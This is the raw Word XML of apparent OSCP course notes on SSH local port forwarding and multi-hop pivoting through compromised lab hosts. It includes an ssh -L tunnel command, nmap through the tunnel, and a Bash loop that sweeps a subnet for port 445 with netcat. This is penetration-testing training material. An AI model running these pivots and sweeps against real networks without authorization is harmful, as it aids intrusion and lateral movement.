          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Together, they form something like: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.10:5432</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E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9edurrac5chz" w:id="73"/>
      <w:bookmarkEnd w:id="73"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Local Port Forwarding</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1892300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="130" name="image129.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image129.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId183"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="189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1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP Module 19</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t xml:space="preserve">In most official documentation, tunneling data through an SSH connection is referred to as SSH port forwarding. But, a regular SSH connection is not a port forward</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000814">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="308"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All SSH uses encryption and creates a tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000815">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="308"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“SSH port forwarding” refers specifically to using that tunnel to carry arbitrary TCP traffic</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not just shell or file transfer).</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In the following example from the book, we learn an example where we have 3 subnets instead of 2. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, we can also use SSH local port forwarding in the same example as the socat one, where we have two subnets and one middleman.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We can do something like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000818">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="452"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -N -L 4445:TARGET:22 user@MIDDLEMAN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000819">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="452"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this on our OWN kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000081A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="452"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Visiting localhost:4445 actually sends packets through the SSH tunnel to Middleman</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000081B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="452"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Middleman forwards that traffic to TARGET:445 on subnet B</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000081C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="452"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p 4445 127.0.0.1 -Pn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000081D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="452"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By specifying 127.0.0.1 and port 4445, this NMAP command gets re-directed (through SSH tunnel) to port 22 on the TARGET machine, as specified in the SSH Local Port Forward. So, we will get results back for the Target machine!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000081E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="452"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will scan port 22 on Target Machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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IMPORTANT: In the most simple scenario with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Middleman</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Target</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can either use socat on the middleman, or SSH on the Kali. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000821">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="529"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The limitation of Socat is that we need socat on the target machine, and shell access on the target machine. We can probably upload the binary though if we need to. Thought it might not be stable on Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000822">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="529"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The limitation of SSH is that we need the SSH port on Middleman to be open AND the SSH credentials to Middleman. We don't actually need shell access on the Middleman in this case, just SSH credentials to Middleman.</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OUTCOME: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The end result is that our Kali specifies the IP and Port of the SSH Client, which then sends traffic to a machine that the SSH server can access. </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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vvnj0b684j1u" w:id="74"/>
      <w:bookmarkEnd w:id="74"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeration</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1892300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="177" name="image170.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image170.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId183"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="189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9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="738"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we are in this more complex scenario, with 3 subnets. We have to pivot through two machines in order to get to the target machine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on port 445</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, lucky for us, we can do this all in a single SSH command! </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000082A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="738"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Both CONFLUENCE01 and PGDATABASE01 are </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the target machine is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000082B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000082C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this scenario, we'll assume that we have compromised both CONFLUENCE01 and PGDATABASE01. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000082D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000082E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4357688" cy="3246331"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="98" name="image92.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image92.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId184"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4357688" cy="3246331"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="960"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip addr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000830">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="960"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this on PGDATABASE01, our second pivot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000831">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="960"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that we are connected to two subnets. And these are our two IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000832">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="960"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4.50.215/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000833">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="960"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.50.215/24</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We'll then run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip route</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to discover what subnets are already in the routing table.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000836">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1536700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="204" name="image199.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image199.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="466"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We find that PGDATABASE01 is attached to another subnet, this time in the 172.16.50.0/24 range (with ens224). We don't find a port scanner installed on PGDATABASE01; however, we can still do some initial reconnaissance with the tools that are available</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Let's write a Bash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> loop to sweep for hosts with an open port 445 on the /24 subnet. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is because we want to access the target machine and we know it has port 445 open. So if there is only one port 445 open, then we know that IP will belong to the target machine.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5414963" cy="1917799"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="489" name="image465.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image465.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId186"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5414963" cy="1917799"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="966"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000083B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="966"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use Netcat to make the connections, passing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-z</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag to check for a listening port without sending data, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-v</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for verbosity, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-w</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> set to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lower time-out threshold</w:t>
      </w:r>
